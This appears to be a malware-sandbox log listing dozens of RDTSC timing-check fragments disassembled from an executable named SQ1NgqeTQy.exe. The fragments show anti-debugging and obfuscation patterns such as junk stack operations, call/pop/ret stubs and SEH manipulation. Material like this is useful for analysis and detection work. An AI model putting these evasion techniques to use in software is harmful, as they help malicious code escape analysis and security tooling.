Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 29A4F0 second address: 29A55B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122D2808h], esi 0x00000010 mov dword ptr [ebp+1244DB05h], ebx 0x00000016 lea ebx, dword ptr [ebp+1244F0AEh] 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F8765238CC8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 jmp 00007F8765238CD0h 0x0000003b xchg eax, ebx 0x0000003c push ebx 0x0000003d ja 00007F8765238CC8h 0x00000043 pop ebx 0x00000044 push eax 0x00000045 push ecx 0x00000046 pushad 0x00000047 jg 00007F8765238CC6h 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 29A5FF second address: 29A605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2BB0E1 second address: 2BB0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jmp 00007F8765238CD0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 28EF43 second address: 28EF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B96B6 second address: 2B96D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8765238CC6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8765238CD4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B96D9 second address: 2B96DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B9E2F second address: 2B9E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8765238CCCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B9E43 second address: 2B9E53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B9E53 second address: 2B9E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8765238CC8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F8765238CCAh 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B9E6E second address: 2B9E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B9FF0 second address: 2B9FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B9FF4 second address: 2BA020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8764C3B8C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8764C3B8BFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2BA020 second address: 2BA02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8765238CC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B2004 second address: 2B2024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8764C3B8C7h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2B2024 second address: 2B2029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2BAAC3 second address: 2BAAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2BAAC7 second address: 2BAAD1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8765238CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2BAAD1 second address: 2BAAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8BEh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2BAF74 second address: 2BAF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2BE348 second address: 2BE36A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8764C3B8C3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F8764C3B8B8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C268B second address: 2C26A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C3BD8 second address: 2C3BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F8764C3B8BEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C3BE7 second address: 2C3BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C3BEB second address: 2C3C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8BBh 0x00000007 jmp 00007F8764C3B8BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jns 00007F8764C3B8D1h 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 288179 second address: 28817E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 28817E second address: 288197 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8764C3B8C0h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C7147 second address: 2C714F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C714F second address: 2C7153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C77AC second address: 2C77B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C77B1 second address: 2C77B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C77B7 second address: 2C77CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8765238CC6h 0x0000000a jbe 00007F8765238CC6h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C791A second address: 2C791E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C791E second address: 2C7927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C7927 second address: 2C792C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2C792C second address: 2C7944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD3h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CB150 second address: 2CB154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CB3E7 second address: 2CB3F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8765238CC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CB930 second address: 2CB934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CBB51 second address: 2CBB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CBB55 second address: 2CBB90 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8764C3B8CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F8764C3B8D4h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8764C3B8C2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CBB90 second address: 2CBB94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CBD5E second address: 2CBD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8764C3B8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CBED1 second address: 2CBED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CBED6 second address: 2CBEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CBFC6 second address: 2CBFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CBFCC second address: 2CC023 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8764C3B8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F8764C3B8B8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jnl 00007F8764C3B8BCh 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F8764C3B8C9h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push ecx 0x00000037 pushad 0x00000038 popad 0x00000039 pop ecx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CD70B second address: 2CD710 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CEBC8 second address: 2CEBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CEBCD second address: 2CEBF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F8765238CD3h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CEBF8 second address: 2CEBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2CEBFC second address: 2CEC00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D0B76 second address: 2D0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D0938 second address: 2D093E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D0B7C second address: 2D0B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D0B80 second address: 2D0BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F8765238CDEh 0x00000011 jmp 00007F8765238CD8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D0BA9 second address: 2D0BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D0BAF second address: 2D0BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D0C4F second address: 2D0C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D0C55 second address: 2D0C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D172B second address: 2D1735 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8764C3B8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D3435 second address: 2D343B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D1E1A second address: 2D1E1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D4402 second address: 2D4408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D4408 second address: 2D440D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D748C second address: 2D7492 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D7492 second address: 2D74BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8764C3B8C1h 0x0000000b push ebx 0x0000000c jnl 00007F8764C3B8BEh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D7A00 second address: 2D7A36 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8765238CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e movzx ebx, bx 0x00000011 push 00000000h 0x00000013 movsx edi, di 0x00000016 push 00000000h 0x00000018 add dword ptr [ebp+122D1A68h], ecx 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8765238CD4h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D8BE7 second address: 2D8BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2D7BCB second address: 2D7C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8765238CCFh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F8765238CC8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push eax 0x0000002b jp 00007F8765238CCAh 0x00000031 pop ebx 0x00000032 push dword ptr fs:[00000000h] 0x00000039 jmp 00007F8765238CCCh 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 sub bx, 45EFh 0x0000004a mov eax, dword ptr [ebp+122D1549h] 0x00000050 xor di, 5222h 0x00000055 push FFFFFFFFh 0x00000057 push ecx 0x00000058 call 00007F8765238CCDh 0x0000005d mov bl, 7Ah 0x0000005f pop edi 0x00000060 pop ebx 0x00000061 nop 0x00000062 jno 00007F8765238CD7h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b ja 00007F8765238CCCh 0x00000071 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DADE5 second address: 2DADEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8764C3B8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DADEF second address: 2DAE7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1F48h], edi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F8765238CC8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a xor bh, 00000001h 0x0000003d mov eax, dword ptr [ebp+122D12DDh] 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007F8765238CC8h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d and ebx, dword ptr [ebp+122D1B31h] 0x00000063 mov dword ptr [ebp+122D251Ah], esi 0x00000069 push FFFFFFFFh 0x0000006b mov edi, dword ptr [ebp+122D2A95h] 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DCCE1 second address: 2DCD6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push ebx 0x00000014 jmp 00007F8764C3B8C5h 0x00000019 pop edi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F8764C3B8B8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 xor dword ptr [ebp+1244F8E3h], edx 0x0000003e xchg eax, esi 0x0000003f jnl 00007F8764C3B8C4h 0x00000045 push eax 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 jng 00007F8764C3B8B6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DDD8C second address: 2DDDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F8765238CD1h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DFDFE second address: 2DFE05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DEF0D second address: 2DEF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DEF11 second address: 2DEF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2E009D second address: 2E00B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DEF15 second address: 2DEF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2E304F second address: 2E307F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F8765238CD6h 0x00000008 jo 00007F8765238CC6h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jg 00007F8765238CC8h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2DEF1B second address: 2DEF34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jc 00007F8764C3B8B6h 0x00000012 jg 00007F8764C3B8B6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2E462C second address: 2E4630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EA204 second address: 2EA208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EA208 second address: 2EA21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F8765238CCCh 0x0000000f je 00007F8765238CC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EA21D second address: 2EA232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 2EA232 second address: 2EA236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
